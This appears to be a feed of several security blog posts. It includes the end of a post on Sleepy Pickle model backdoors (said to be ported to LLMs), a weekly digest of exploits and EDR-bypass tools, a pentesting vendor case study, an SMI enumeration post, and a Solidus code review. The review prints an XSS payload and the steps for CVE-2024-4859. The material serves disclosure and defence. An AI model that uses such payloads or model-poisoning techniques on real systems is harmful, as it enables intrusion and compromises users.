Avoid getting into a pickle with unsafe file formats!

The best way to protect against Sleepy Pickle and other supply chain attacks is to only use models from trusted organizations and rely on safer file formats like SafeTensors. Pickle scanning and restricted unpicklers are ineffective defenses that dedicated attackers can circumvent in practice.

Sleepy Pickle demonstrates that advanced model-level attacks can exploit lower-level supply chain weaknesses via the connections between underlying software components and the final application. However, other attack vectors exist beyond pickle, and the overlap between model-level security and supply chain is very broad. This means it’s not enough to consider security risks to AI/ML models and their underlying software in isolation, they must be assessed holistically. If you are responsible for securing AI/ML systems, remember that their attack surface is probably way larger than you think.

Stay tuned for our next post introducing Sticky Pickle, a sophisticated technique that improves on Sleepy Pickle by achieving persistence in a compromised model and evading detection!

Acknowledgments

Thank you to Suha S. Hussain for contributing to the initial Sleepy Pickle PoC and our intern Lucas Gen for porting it to LLMs.

Last Week in Security (LWiS) - 2024-06-10

By: Erik
11 June 2024 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the past week. This post covers 2024-06-03 to 2024-06-10.

News

Techniques and Write-ups

  • No Way, PHP Strikes Again! (CVE-2024-4577) - On Windows (specifically the Chinese and Japanese locales), a '%AD' in a URL gets interpreted as '-' which can lead to remote code execution depending on how PHP is configured. By default, the XAMPP project is vulnerable.
  • How to Train Your Large Language Model - Ever wondered how people 'fine tune' large language models for specific tasks? This post walks through training a local model and GPT-4 to assist with making sense of the pseudo-code output in the IDA Pro disassembler. The model and plugin code can be found at aidapal.
  • WHFB and Entra ID: Say Hello to Your New Cache Flow - With Windows Hello for Business and Entra ID, there still needs to be a way to authenticate the user on the device if the device is offline. This cache can be used by attackers to bruteforce passwords. The use of a trusted platform module (TPM), or better yet a TPM v2, will slow down this bruteforce considerably.
  • An Introduction to Chrome Exploitation - Maglev Edition - Besides mobile devices, Chrome is probably the next hardest target. This post covers Chromium Security Architecture and the V8 Pipeline, with a focus on the Maglev Compiler. It also covers the root cause analysis of CVE-2023-4069 and how to exploit it with JIT-spraying shellcode.
  • Inside the Box: Malware's New Playground - Malware groups are using the BoxedApp product to evade detection. This mirrors earlier efforts that used VMprotect. If you can pay a modest price for a commercial packer that will help you evade EDR, many financially motivated actors will do so. Are you using commercial packers in your adversary simulations?
  • Hacking Millions of Modems (and Investigating Who Hacked My Modem) - A hacker discovers his modem is compromised, and through the course of investigating finds a way to hack any Cox customer's modem.
  • Becoming any Android app via Zygote command injection - Meta's red team discovered a vulnerability in Android (now patched) that allows an attacker with the WRITE_SECURE_SETTINGS permission, which is held by the ADB shell and certain privileged apps, to execute arbitrary code as any app on a device. By doing so, they could read and write any app's data, make use of per-app secrets and login tokens, change most system configuration, unenroll or bypass Mobile Device Management, and more. The exploit involves no memory corruption, meaning it worked unmodified on virtually any device running Android 9 or later, and persists across reboots. This feels like a vulnerability that will make some advanced actors very upset to see patched.
  • Deep diving into F5 Secure Vault - After Exploiting an F5 Big-IP, @myst404_ set their sights on the "Secure Vault." Spoiler: it isn't all that secure.
  • Windows Internals: Dissecting Secure Image Objects - Part 1 - The king of technical deep dives is back! Funny that this is actually a third order blog post spawned from research originally into the Kernel Control Flow Guard (Kernel CFG) feature. As always, Connor delivers a great, highly technical post.
  • Bypassing Veeam Authentication CVE-2024-29849 - "This vulnerability in Veeam Backup Enterprise Manager allows an unauthenticated attacker to log in to the Veeam Backup Enterprise Manager web interface as any user. - Critical"
  • [PDF] Paged Out! #4 (14MB, beta1 build) - A great modern zine.
  • Spray passwords, avoid lockouts - A very compreshensive look at Windows password policy. conpass is the new tool dropped to implement the ideas presented in the post.
  • Develop your own C# Obfuscator - Sure, you've used ConfuserEx, but what if you wrote your own C# obfuscator?
  • Bypassing EDR NTDS.dit protection using BlueTeam tools. - Love to see traitorware in the wild.
  • One Phish Two Phish, Red Teams Spew Phish - How to give your phishing domains a reputation boost.

Tools and Exploits

  • MAT - This tool, programmed in C#, allows for the fast discovery and exploitation of vulnerabilities in MSSQL servers.
  • AmperageKit - One stop shop for enabling Recall in Windows 11 version 24H2 on unsupported devices.
  • omakub - Opinionated Ubuntu Setup.
  • chromedb - Read Chromium data (namely, cookies and local storage) straight from disk, without spinning up the browser.
  • The_Shelf - Retired TrustedSec Capabilities. See Introducing The Shelf for more.
  • RflDllOb - Reflective DLL Injection Made Bella.
  • CVE-2024-29849 - Veeam Backup Enterprise Manager Authentication Bypass (CVE-2024-29849).
  • rsescan - RSEScan is a command-line utility for interacting with the RSECloud. It allows you to fetch subdomains and IPs from certificates for a given domain or organization.
  • MDE_Enum - comprehensive .NET tool designed to extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules without Admin privileges.
  • Disable-TamperProtection - A POC to disable TamperProtection and other Defender / MDE components.

New to Me and Miscellaneous

This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!

  • How Malware Can Bypass Transparency Consent and Control (CVE-2023-40424) - CVE-2023-40424 is a vulnerability that allows a root-level user to create a new user with a custom Transparency Consent and Control (TCC) database in macOS, which can then be used to access other users' private data. It was fixed in 2023 in macOs Sonoma (but not backported to older versions!).
  • PsMapExec - A PowerShell tool that takes strong inspiration from CrackMapExec / NetExec.
  • Evilginx-Phishing-Infra-Setup - Evilginx Phishing Engagement Infrastructure Setup Guide.
  • File-Tunnel - Tunnel TCP connections through a file.
  • awesome-cicd-attacks - Practical resources for offensive CI/CD security research. Curated the best resources I've seen since 2021.
  • JA4+ Database - Download, read, learn about, and contribute to augment your organization's JA4+ network security efforts
  • detection-rules is the home for rules used by Elastic Security. This repository is used for the development, maintenance, testing, validation, and release of rules for Elastic Security's Detection Engine.
  • openrecall - OpenRecall is a fully open-source, privacy-first alternative to proprietary solutions like Microsoft's Windows Recall. With OpenRecall, you can easily access your digital history, enhancing your memory and productivity without compromising your privacy.
  • knock - Knock Subdomain Scan.
  • ubiquity-toolkit - A collection of statically-linked tools targeted to run on almost any linux system.
  • SOAPHound - A fork of SOAPHound that uses an external server to exfiltrate the results vs dropping them on disk for improved OPSEC.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing.

Before yesterdayMain stream

The Critical Role of Autonomous Penetration Testing in Strengthening Defense in Depth

10 June 2024 at 19:21

A Modern Approach to Comprehensive Cybersecurity

Defense in Depth (DID) is crucial in cybersecurity because it employs multiple layers of security controls and measures to protect information systems and data. This multi-layered approach helps ensure that if one defensive layer is breached, others continue to provide protection, significantly reducing the likelihood of a successful cyber-attack. By combining physical security, network security, endpoint protection, application security, data security, identity and access management, security policies, monitoring, backup and recovery, and redundancy, organizations can create a robust and resilient security posture that is adaptable to evolving threats. This comprehensive strategy is essential for safeguarding sensitive information, maintaining operational integrity, and complying with regulatory requirements.

However, DID is not a panacea. While it greatly enhances an organization’s security, it cannot guarantee absolute protection. The complexity and layered nature of DID can lead to challenges in management, maintenance, and coordination among different security measures. Additionally, sophisticated attackers continuously develop new methods to bypass multiple layers of defense, such as exploiting zero-day vulnerabilities or using social engineering techniques to gain access and exploit an environment. This highlights the importance of complementing DID with other strategies, such as regular security assessments, autonomous penetration testing, continuous monitoring, and fostering a security-aware culture within an organization. These additional measures help to identify and address emerging threats promptly, ensuring a more dynamic and proactive security approach.

Mission:

JTI Cybersecurity helps organizations around the world improve their security posture and address cybersecurity challenges. They work with small businesses, enterprises, and governments whose customers demand the highest levels of trust, security, and assurance in the protection of their sensitive data and mission-critical operations. JTI provides prudent advice and solutions when following best practices isn’t enough to protect the interests of their clients and the customers they serve.

  • Year Founded: 2020
  • Number of Employees: 5-10
  • Operational Reach: Global

Threat Intelligence

In November 2023, the prolific ransomware group LockBit confirmed a cyberattack on Boeing that impacted its parts and distribution business, as well as part of its global services division. The incident occurred following claims from LockBit that they had breached Boeing’s network and stolen sensitive data. Although Boeing confirmed that flight safety was not compromised, the LockBit group initially threatened to leak and expose the stolen sensitive data if Boeing did not negotiate. This incident not only underscores the persistent threats faced by major corporations but also highlights the importance of implementing robust cybersecurity measures.

Is the concept of DID dead?

In a recent interview with Jon Isaacson, Principal Consultant at JTI Cybersecurity, he highlights that, “some marketing material goes as boldly as saying DID doesn’t work anymore.” However, Jon goes on to say that “DID is still a good strategy, and generally when it fails, it’s not because a layer of the onion failed…it’s because the term is overused, and the organization probably didn’t have any depth at all.” While this is a concept that’s been around for quite some time, its importance hasn’t diminished. In fact, as cyber threats evolve and become increasingly sophisticated, the need for a layered approach to security remains critical.

However, it’s also true that the term can sometimes be overused or misapplied, leading to a perception of it being outdated or ineffective. This can happen if organizations simply pay lip service to the idea of defense in depth without implementing meaningful measures at each layer or if they rely too heavily on traditional approaches without adapting to new threats and technologies.

In today’s rapidly changing threat landscape, organizations need to continually reassess and update their security strategies to ensure they’re effectively mitigating risks. This might involve integrating emerging technologies like autonomous pentesting, adopting a zero-trust security model, or implementing robust incident response capabilities alongside traditional defense in depth measures. While defense in depth may be considered a fundamental principle, its implementation and effectiveness depend on how well it’s adapted to meet the challenges of modern cybersecurity threats.

“While DID definitely helps shore up your defenses, without taking an attackers perspective by considering actual attack vectors that they can use to get in, you really can’t be ready.”

DID and the attacker’s perspective

In general, implementing a DID approach to an organization’s security posture helps slow down potential attacks and often challenges threat actors from easily exploiting an environment. Additionally, this forces attackers to use various tactics, techniques, and procedures (TTPs) to overcome DID strategies, and maneuver across layers to find weak points and exploit the path of least resistance. An attacker’s ability to adapt quickly, stay agile, and persist creates challenges for security teams attempting to stay ahead of threats and keep their cyber landscape secure.

As Jon explains, an “adversary is not going to be sitting where Tenable Security Center (for example) is installed with the credentials they have poking through the registry…that’s not how the adversary works…many organizations try to drive their vulnerability management programs in a compliance fashion, ticking off the boxes, doing their required scans, and remediating to a certain level…but that doesn’t tell you anything from an adversary’s perspective.” One of the only ways to see things from an attacker’s perspective is to attack your environment as an adversary would.

Enter NodeZero

Before discovering NodeZero, Jon was working through the best way to build his company, while offering multiple services to his clients. He mentions that “when JTI first started, it was just him, bouncing back and forth between pentesting and doing a SOC2 engagement…early on, there weren’t a massive amount of pentests that had to be done and most were not huge…so doing a lot manually wasn’t a big deal.” However, with his business booming, Jon got to a point where doing a pentest 100% manually was just no longer a thing and he required a solution that was cost effective and that he could run continuously to scale his capabilities for his customers.

Additionally, Jon toyed with the idea of building custom scripts and having a solution automate them so at least some of the work was done for him, weighing his options between semi-automated or buying a solution. Jon first learned of Horizon3.ai through one of his customers, who was also exploring the use of an autonomous pentesting solution. So, after poking around a few competitors of Horizon3.ai that didn’t yield the results he was hoping for, he booked a trial.

NodeZero doesn’t miss anything

At the time, Jon was skeptical that any platform could outperform manual pentesting while supporting his need for logs and reporting. But, as he explains, “there was nothing that [Node Zero] really missed [compared to his previous manual pentests] and there were cases where [NodeZero] would find something that was not found through manual testing.”

After initial trial testing, Jon dove headfirst when he was onboarded with Horizon3.ai and started using NodeZero for many of his pentesting engagements. Looking through the eyes of an attacker, “we can drop NodeZero into an environment and let it do its thing…NodeZero not only enumerates the entire attack surface, but also finds vulnerabilities and attempts to exploit them as an attacker would.” This enables Jon to provide more value to his clients by digging into results to determine actual business impacts, provide specific recommendations for mitigations or remediations, and verify those fixes worked. “[End users] can get a lot of value out of NodeZero even if they aren’t a security expert or pentester because you really can just click it, send it, and forget it…the best bang for their buck is the laundry list of things they [end users] can do to secure their environment every time they run it [NodeZero].”

“NodeZero is a really great tool for both consultants and pentesters…because for us pentesters, we can use it [NodeZero] kind of like the grunts or infantry of the military…just send it in to go blow everything up and then we [pentesters] can be a scalpel, and really dig into and spend time on the areas where things are potentially bad.”

So what?

DID is not dead and is a critical concept in cybersecurity, leveraging multiple layers of security controls to protect information systems and data. By integrating various security measures, organizations create a robust and resilient security posture. This layered approach ensures that if one defense layer is breached, others continue to provide protection, significantly reducing the likelihood of a successful cyber-attack.

However, DID is not a cure-all; it has its limitations. The complexity and layered nature can pose challenges in management and maintenance, and sophisticated attackers may still find ways to bypass defenses using advanced techniques like zero-day exploits or social engineering. Therefore, it’s essential to complement DID with autonomous penetration testing, continuous monitoring, and fostering a security-aware culture to address emerging threats proactively and dynamically.

Download PDF

The post The Critical Role of Autonomous Penetration Testing in Strengthening Defense in Depth appeared first on Horizon3.ai.

Unlocking data privacy: Insights from the data diva | Guest Debbie Reynolds

By: Infosec
10 June 2024 at 18:00

Today on Cyber Work, I’m very excited to welcome Debbie Reynolds, the Data Diva herself, to discuss data privacy. Reynolds developed a love of learning about data privacy since working in library science, and she took it through to legal technologies. She now runs her own data privacy consultancy and hosts the long-running podcast “The Data Diva Talks Privacy Podcast.” We talk about data privacy in all its complex, nerdy, and sometimes frustrating permutations, how GDPR helped bring Reynolds to even greater attention, how AI has added even more layers of complexity and some great advice for listeners ready to dip their toes into the waters of a data privacy practitioner career.

– Get your FREE cybersecurity training resources: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Data privacy
3:29 - First, getting into computers
7:46 - Inspired by GDPR
9:00 - Pivoting to a new cybersecurity career
12:01 - Learning different privacy regulation structures
15:17 - Process of building data systems 
17:41 - Worst current data privacy issue
20:57 - The best in AI and data privacy
22:15 - The Data Diva Podcast
25:24 - The role of data privacy officer
30:36 - Cybersecurity consulting
36:21 - Positives and negatives of data security careers
39:34 - Reynolds' typical day
41:11 - How to get hired in data privacy
48:38 - The best piece of cybersecurity career advice
50:25 - Learn more about the Data Diva
51:14 - Outro

About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.

💾

Enumerating System Management Interrupts

10 June 2024 at 16:00

System Management Interrupts (SMI) provide a mechanism for entering System Management Mode (SMM) which primarily implements platform-specific functions related to power management. SMM is a privileged execution mode with access to the complete physical memory of the system, and to which the operating system has no visibility. This makes the code running in SMM an ideal target for malware insertion and potential supply chain attacks. Accordingly, it would be interesting to develop a mechanism to audit the SMIs present on a running system with the objective of cross-referencing this information with data provided by the BIOS supplier. This could help ensure that no new firmware entry-points have been added in the system, particularly in situations where there is either no signature verification for the BIOS, or where such verification can be bypassed by the attacker.

The section 32.2, “System Management Interrupt (SMI)” of Intel’s System Programming Guide [1], states the following regarding the mechanisms to enter SMM and its assigned system priority:

“The only way to enter SMM is by signaling an SMI through the SMI# pin on the processor or through an SMI message received through the APIC bus. The SMI is a nonmaskable external interrupt that operates independently from the processor’s interrupt- and exception-handling mechanism and the local APIC. The SMI takes precedence over an NMI and a maskable interrupt. SMM is non-reentrant; that is, the SMI is disabled while the processor is in SMM.”

Many mainboard Chipsets (PCH), such as the Intel 500 series chipset family [2], expose the I/O addresses B2h and B3h, enabling the signaling of the SMI# pin on the processor. Writting a byte-value to the address B2h signals the SMI code that corresponds to the written value. The address B3h is used for passing information between the processor and the SMM and needs to be written before the SMI is signaled.

Chipsec [3] is the industry standard tool for auditing the security of x86 platform firmware. It is open source and maintained by Intel. Chipsec includes a module called smm_ptr, which searches for SMI handlers that result in the modification of an allocated memory buffer. It operates by filling the allocated memory with an initial value that is checked after every SMI call. It then iterates through all specified SMI codes, looking for changes in the buffer, the address of which is passed to the SMI via the processor’s general-purpose registers (GPRS).

Although highly useful as a reference approach to trigger SMIs by software, Chipsec’s smm_ptr module does not fulfill the objective of enumerating them. Only when the SMI has an observable change in the passed memory buffer does the module consider it vulnerable and flags its existance.

Since our goal is to enumerate SMIs, I considered measuring the time it takes for the SMI to execute as a simple measure of the complexity of its handler. The hypothesis is that an SMI code ignored by the BIOS would result in a shorter execution time compared to when the SMI is properly attended. With this objective in mind, I added the ‘scan’ mode to the smm_ptr module [4].

The scan mode introduces a new ioctl command to the Chipsec’s kernel module that triggers the SMI and returns the elapsed time to the caller. This mode maintains an average of the time it takes for an SMI to execute and flags whenever one exceeds a defined margin.

In the initial tests performed, an unexpected behaviour was observed in which, with a periodicity of one second, a ten times larger runtime appeared for the same SMI code. To confirm these outliers were only present when the SMI was signaled, I implemented an equivalent test measuring the time spent by an equivalently long time-consuming loop replacing the SMI call. The results of both tests are presented below.

CPU counts per SMI call
CPU counts per test loop execution

The details of each long-running SMI are detailed next, where ‘max’ and ‘min’ values are the maximum and minimum measured elapsed time in CPU counts, ‘total’ is the number of SMIs signaled, ‘address’ shows the register used for passing the address of the allocated buffer, and ‘data’ is the value written to the I/O address B3h.

SMI: 0, max: 5023124, min: 680534, count: 7, total: 12288,
  long-running SMIs: [
  {'time offset': 278.017 ms, 'counts': 3559564, 'rcx': 11, 'address': rbx, 'data': 0x09},
  {'time offset': 1278.003 ms, 'counts': 3664844, 'rcx': 14, 'address': rbx, 'data': 0x2C},
  {'time offset': 2277.865 ms, 'counts': 4244506, 'rcx': 1, 'address': rbx, 'data': 0x50},
  {'time offset': 3277.685 ms, 'counts': 4950032, 'rcx': 4, 'address': rsi, 'data': 0x73},
  {'time offset': 4277.681 ms, 'counts': 5023124, 'rcx': 8, 'address': rbx, 'data': 0x96},
  {'time offset': 5277.898 ms, 'counts': 4347570, 'rcx': 11, 'address': rbx, 'data': 0xB9},
  {'time offset': 6277.909 ms, 'counts': 4374736, 'rcx': 14, 'address': rsi, 'data': 0xDC}]

I don’t know the reason for these periodic lengthy SMIs. I can only speculate these might be NMI interrupts being blocked by SMM and serviced with priority right after exiting SMM and before the time is measured. In any case, I opted for performing a confirmation read once a long-running SMI is found, which effectively filters out these long measurements, resulting in the output shown below. It has an average elapsed time of 770239.23 counts and standard deviation of 7377.06 counts (0.219749 ms and 2.104e-06 seconds respectively on a 3.5 GHz CPU).

CPU counts per SMI filtered out the outliers

To discard any effects of the values passed to the SMI, I ran the test by repeatedly signaling the same SMI code and parameters. Below is the result using the confirmation read strategy, showing an average value of 769718.88 counts (0.219600 ms) and standard deviation of 6524.88 counts (1.861e-06 seconds).

CPU counts per SMI filtered out the outliers and using the same SMI parameters

The proposed scan mode is effective in identifying long-running SMIs present in the system. However, it is unable to find others that fall within the bounds of the defined threshold. For example, using an arbitrary threshold of 1/3 times larger than the average, the implementation was not successful noticing some of the SMIs flagged by the smm_ptr’s fuzz and fuzzmore modes. The main reasons are the large deviation observed and the challenge of dealing with a system for which no confirmed SMI codes are provided, making it difficult to calibrate the algorithm and establish a suitable threshold value.

The implementation has been merged into the upstream version of Chipsec and will be included in the next release [5].

[1] Intel® 64 and IA-32 Architectures Software Developer’s Manual Volume 3 (3A, 3B, 3C, 3D): System Programming Guide
[2] Intel® 500 Series Chipset Family On- Package Platform Controller Hub Datasheet, Volume 1 of 2. Rev. 007, September 2021.
[3] https://chipsec.github.io/
[4] https://github.com/nccgroup/chipsec/commit/eaad11ad587d951d3720c43cbce6d068731b7cdb
[5] https://github.com/chipsec/chipsec/pull/2141

Solidus — Code Review

Solidus — Code Review

As a Research Engineer at Tenable, we have several periods during the year to work on a subject of our choice, as long as it represents an interest for the team. For my part, I’ve chosen to carry out a code review on a Ruby on Rails project.

The main objective is to focus on reviewing code, understanding it and the various interactions between components.

I’ve chosen Solidus which is an open-source eCommerce framework for industry trailblazers. Originally the project was a fork of Spree.

Developed with the Ruby on Rails framework, Solidus consists of several gems. When you require the solidus gem in your Gemfile, Bundler will install all of the following gems:

  • solidus_api (RESTful API)
  • solidus_backend (Admin area)
  • solidus_core (Essential models, mailers, and classes)
  • solidus_sample (Sample data)

All of the gems are designed to work together to provide a fully functional ecommerce platform.

https://www.tenable.com/research

Project selection

Solidus wasn’t my first choice, I originally wanted to select Zammad, which is a web-based open source helpdesk/customer support system also developed with Ruby on Rails.

The project is quite popular and, after a quick look, has a good attack surface. This type of project is also interesting because for many businesses, the support/ticketing component is quite critical, identifying a vulnerability in a project such as Zammad almost guarantees having an interesting vulnerability !

For various reasons, whether it’s on my professional or personal laptop, I need to run the project in a Docker, something that’s pretty common today for a web project but :

Zammad is a project that requires many bricks such as Elasticsearch, Memcached, PostgresQL & Redis and although the project provided a ready-to-use docker-compose, as soon as I wanted to use it in development mode, the project wouldn’t initialize properly.

Rather than waste too much time, I decided to put it aside for another time (for sure) and choose another project that seemed simpler to get started on.

After a tour of Github, I came across Solidus, which not only offers instructions for setting up a development environment in just a few lines, but also has a few public vulnerabilities.

For us, this is generally a good sign in terms of communication in case of a discovery. This shows that the publisher is open to exchange, which is unfortunately not always the case.

The reality is that I also had a few problems with the Solidus Dockerfile supplied, but by browsing the issues and making some modifications on my own I was able to quickly launch the project.

Project started with bin/dev cmd

Ruby on Rails Architecture & Attack Surface

Like many web frameworks, Ruby on Rails uses an MVC architecture, although this is not the theme of this blog post, a little reminder doesn’t hurt to make sure you understand the rest:

  • Model contains the data and the logic around the data (validation, registration, etc.)
  • View displays the result to the user
  • The Controller handles user actions and modifies model and view data. It acts as a link between the model and the view.

Another important point about Ruby on Rails is that this Framework is “Convention over Configuration”, which means that many choices are made for you, and means that all environments used will have similarities, which makes it easier to understand a project from an attacker’s point of view if you know how the framework works.

In a Ruby on Rails project, application routing is managed directly by the ‘config/routes.rb’ file. All possible actions are defined in this file !

As explained in the overview chapter, Solidus is composed of a set of gems (Core, Backend & API) designed to work together to provide a fully functional ecommerce platform.

These three components are independent of each other, so when we audit the Github Solidus/Solidus project, we’re actually auditing multiple projects with multiple distinct attack surfaces that are more or less interconnected.

Solidus has three main route files :

  • Admin Namespace SolidusAdmin::Engine
  • Backend Namespace Spree::Core::Engine
  • API Namespace Spree::Core::Engine

Two of the three files are in the same namespace, while Admin is more detached.

A namespace can be seen as a “group” that contains Classes, Constants or other Modules. This allows you to structure your project. Here, it’s important to understand that API and Backend are directly connected, but cannot interact directly with Admin.

If we take a closer look at the file, we can see that routes are defined in several ways. Without going into all the details and subtleties, you can either define your route directly, such as

get '/orders/mine', to: 'orders#mine', as: 'my_orders'

This means “The GET request on /orders/mine” will be sent to the “mine” method of the “Orders” controller (we don’t care about the “as: ‘my_orders” here).

module Spree
module Api
class OrdersController < Spree::Api::BaseController
#[...]
def mine
if current_api_user
@orders = current_api_user.orders.by_store(current_store).reverse_chronological.ransack(params[:q]).result
@orders = paginate(@orders)
else
render "spree/api/errors/unauthorized", status: :unauthorized
end
end
#[...]

Or via the CRUD system using something like :

resources :customer_returns, except: :destroy

For the explanations, I’ll go straight to what is explained in the Ruby on Rails documentation :

“In Rails, a resourceful route provides a mapping between HTTP verbs and URLs to controller actions. By convention, each action also maps to a specific CRUD operation in a database.”

So here, the :customer_returns resource will link to the CustomerReturns controller for the following URLs :

  • GET /customer_returns
  • GET /customer_returns/new
  • POST /customer_returns
  • GET /customer_returns/:id
  • GET /customer_returns/:id/edit
  • PATCH/PUT /customer_returns/:id
  • ̶D̶E̶L̶E̶T̶E̶ ̶/̶c̶u̶s̶t̶o̶m̶e̶r̶_̶r̶e̶t̶u̶r̶n̶s̶/̶:̶i̶d̶ is ignored because of “except: :destroy”

So, with this, it’s easy to see that Solidus has a sizable attack surface.

Static Code Analysis

This project also gives me the opportunity to test various static code analysis tools. I don’t expect much from these tools but as I don’t use them regularly, this allows me to see what’s new and what’s been developing.

The advantage of having an open source project on Github is that many static analysis tools can be run through a Github Action, at least… in theory.

Not to mention all the tools tested, CodeQL is the only one that I was able to run “out of the box” via a Github Action, the results are then directly visible in the Security tab.

Extract of vulnerabilities identified by CodeQL

Processing the results from all the tools takes a lot of time, many of them are redundant and I have also observed that some paid tools are in fact just overlays of open source tools such as Semgrep (the results being exactly the same / the same phrases).

Special mention to Brakeman, which is a tool dedicated to the analysis of Ruby on Rails code, the tool allows you to quickly and simply have some interesting path to explore in a readable manner.

Extract of vulnerabilities identified by Brakeman

Without going over all the discoveries that I have put aside (paths to explore). Some vulnerabilities are quick to rule out. Take for example the discovery “Polynomial regular expression used on uncontrolled data” from CodeQL :

In addition to seeming not exploitable to me, this case is not very interesting because it affects the admin area and therefore requires elevated privileges to be exploited.

Now with this “SQL Injection” example from Brakeman :

As the analysis lacks context, it does not know that in reality “price_table_name” does not correspond to a user input but to the call of a method which returns the name of a table (which is therefore not controllable by a user).

However, these tools remain interesting because they can give a quick overview of areas to dig.

Identifying a Solidus Website

Before getting into the nitty-gritty of the subject, it may be interesting to identify whether the visited site uses Solidus or not and for that there are several methods.

On the main shop page, it is possible to search for the following patterns :

<p>Powered by <a href="http://solidus.io/">Solidus</a></p>
/assets/spree/frontend/solidus_starter_frontend

Or check if the following JS functions are available :

Solidus()
SolidusPaypalBraintree

Or finally, visit the administration panel accessible at ‘/admin/login’ and look for one of the following patterns :

<img src="/assets/logo/solidus
<script src="/assets/solidus_admin/
solidus_auth_devise replaces this partial

Unfortunately, no technique seems more reliable than the others and these do not make it possible to determine the version of Solidus.

Using website as normal user

In order to get closer to the product, I like to spend time using it as a typical user and given the number of routes available, I thought I’d spend a little time there, but I was soon disappointed to see that for a classic user, there isn’t much to do outside the purchasing process. :

Once the order is placed, user actions are rather limited

  • See your orders
  • See a specific order (But no PDF or tracking)
  • Update your information (Only email and password)

We will just add that when an order is placed, an email is sent to the user and a new email is sent when the product is shipped.

The administration is also quite limited, apart from the classic actions of an ecommerce site (management of orders, products, stock, etc.) there is only a small amount of configuration that can be done directly from the panel.

For example, it is not possible to configure SMTP, this configuration must be done directly in the Rails project config

Authentication & Session management

Authentication is a crucial aspect of web application security. It ensures that only authorized individuals have access to the application’s features and sensitive data.

Devise is a popular, highly configurable and robust Ruby on Rails gem for user authentication. This gem provides a complete solution for managing authentication, including account creation, login, logout and password reset.

One reason why Devise is considered a robust solution is its ability to support advanced security features such as email validation, two-factor authentication and session management. Additionally, Devise is regularly updated to fix security vulnerabilities and improve its features.

When I set up my Solidus project, version 4.9.3 of Devise was used, i.e. the latest version available so I didn’t spend too much time on this part which immediately seemed to me to be a dead end.

Authorization & Permissions management

Authorization & permissions management is another critical aspect of web application security. It ensures that users only have access to the features and data that they are permitted to access based on their role or permissions.

By default, Solidus only has two roles defined

  • SuperUser : Namely the administrator, which therefore allows access to all the functionalities
  • DefaultCustomer : The default role assigned during registration, the basic role simply allowing you to make purchases on the site

To manage this brick, Solidus uses a gem called CanCanCan. Like Devise, CanCanCan is considered as a robust solution due to its ability to support complex authorization scenarios, such as hierarchical roles and dynamic permissions. Additionally, CanCanCan is highly configurable.

Furthermore, CanCanCan is highly tested and reliable, making it a safe choice for critical applications. It also has an active community of developers who can provide assistance and advice if needed.

Some Rabbit Holes

1/ Not very interesting Cross-Site Scripting

Finding vulnerabilities is fun, even more so if they are critical, but many articles do not explain that the search takes a lot of time and that many attempts lead to nothing.

Digging into these vulnerabilities, even knowing that they will lead to nothing, is not always meaningless.

Let’s take this Brakeman detection as an example :

Despite the presence of `:target => “_blank”` which therefore makes an XSS difficult to exploit (or via crazy combinations such as click wheel) I found it interesting to dig into this part of the code and understand how to achieve this injection simply because this concerns the administration part.

Here’s how this vulnerability could be exploited :

1/ An administrator must modify the shipping methods to add the `javascript:alert(document.domain)` as tracking URL

2/ A user must place an order

3/ An administrator must validate the order and add a tracking number

4/ The tracking URL will therefore correspond to the payload which can be triggered via a click wheel

By default, the only role being possible being an administrator the only possibility is that an administrator traps another administrator… in other words, far from being interesting

Note : According to Solidus documentation, in a configuration that is not the basic one, it would be possible for a user with less privileges to exploit this vulnerability

Although the impact and exploitation are very low, we have pointed out the weakness to Solidus. Despite several attempts to contact them, we have not received a response.
The vulnerability was published under
CVE-2024–4859

2/ Solidus, State Machine & Race Conditions

In an ecommerce site, I find that testing race conditions is a good thing because certain features are conducive to this test, such as discount tickets.

But before talking about race condition, we must understand the concept of State machine

A state machine is a behavioral model used in software development to represent the different states that an object or system can be in, as well as the transitions between those states. In the context of a web application, a state machine can be used to model the different states that a user or resource can be in, and the actions that can be performed to transition between those states.

For example, in Solidus, users can place orders. A user can be in one of several states with respect to an order, such as “pending”, “processing”, or “shipped”. The state machine would define these states and the transitions between them, such as “place order” (which transitions from “pending” to “processing”), “cancel order” (which transitions from “processing” back to “pending”), and “ship order” (which transitions from “processing” to “shipped”).

Using a state machine in a web application provides several benefits. First, it helps to ensure that the application is consistent and predictable, since the behavior of the system is clearly defined and enforced. Second, it makes it easier to reason about the application and debug issues, since the state of the system can be easily inspected and understood. Third, it can help to simplify the codebase, since complex logic can be encapsulated within the state machine.

If I talk about that, it’s because the Solidus documentation has a chapter dedicated to that and I think it’s quite rare to highlight it !

Now we can try to see if any race conditions are hidden in the use of a promotion code.

This section of the code being still in Spree (the ancestor of Solidus), I did not immediately get my hands on it, but in the case of a whitebox audit, it is sometimes easier to trace the code from an error in the site.

In this case, by applying the same promo code twice, the site indicates the error “The coupon code has already been applied to this order”

Then simply look for the error in the entire project code and then trace its use backwards to the method which checks the use of the coupon

It’s quite difficult to go into detail and explain all the checks but we can summarize by simply explaining that a coupon is associated with a specific order and as soon as we try to apply a new coupon, the code checks if it is already associated with the order or not.

So to summarize, this code did not seem vulnerable to any race conditions.

Presenting all the tests carried out would be boring, but we understand from reading these lines that the main building blocks of Solidus are rather robust and that on a default installation, I unfortunately could not find much.

So, maybe it is more interesting to focus on custom development, in particular extensions. On solidus, we can arrange the extensions according to 3 types

  • Official integrations : Listed on the main website, we mainly find extensions concerning payments
  • Community Extensions : Listed on a dedicated Github repository, we find various and varied extensions that are more or less maintained
  • Others Extensions : Extensions found elsewhere, but there’s no guarantee that they’ll work or that they’ll be supported

Almost all official extensions require integration with a 3rd party and will therefore make requests on a third party, which is what I wanted to avoid here.

Instead, I turned to the community extensions to test a few extensions for which I would have liked to have native functionality on the site, such as PDF invoice export.

